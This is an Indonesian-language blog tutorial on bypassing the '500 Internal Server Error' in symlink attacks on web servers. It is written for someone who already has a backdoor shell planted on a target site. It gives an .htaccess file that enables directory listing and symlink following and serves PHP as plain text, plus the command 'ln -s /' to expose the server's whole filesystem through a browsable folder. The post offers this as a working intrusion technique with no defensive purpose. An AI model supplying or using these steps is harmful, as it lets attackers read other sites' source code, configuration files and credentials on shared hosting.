Header Ads

Bypass Symlink 500 Internal Server Error

Oke Kali ini saya akan post tutorial Bypass Symlink 2017 Internal Server Error . Mungkin para mastah sudah mengetahuinya :)Oke cekidot



Udah dapet symlink ribuan bahkan puluhan ribu tapi internal server error :(
kasian banget gan .. langsung saja


Untuk cara bypass bisa dibilang cukup mudah bahkan agak sulit  :v

Bahan-bahan :

1. Shell backdoor yang tertanam di web yang mau di symlink
2. Web yang mau disymlink vuln/bisa
3.Kopi udud jan lupa gan :v

Prof of Concept :

1. Buat Direktory baru/buat folder baru namanya apa terserah mau di dir mana terserah
contoh: Folder namanya symlinkngentot

2. Buat new file/file baru buat .htaccess di dalam folder yang dibuat tadi.
nb : *ingat ya htaccess pake (titik) di depan nama htaccess jadi .htaccess

3. Isi .htaccess dengan kode berikut

Options Indexes FollowSymLinks
DirectoryIndex ps.html
AddType txt .php
AddHandler txt .php

4. Save file tersebut

5. Buka menu command di shell kalian

6. Dan ketikan perintah di command shell kalian

ln -s / symlinkngentot

7. Klik run

8. Buka directory mu tadi contoh target.co.li/symlinkngentot

Oke gan dah bisa tinggal di anuin :v

Sekian tutor kali ini semoga bermanfaat :*

No comments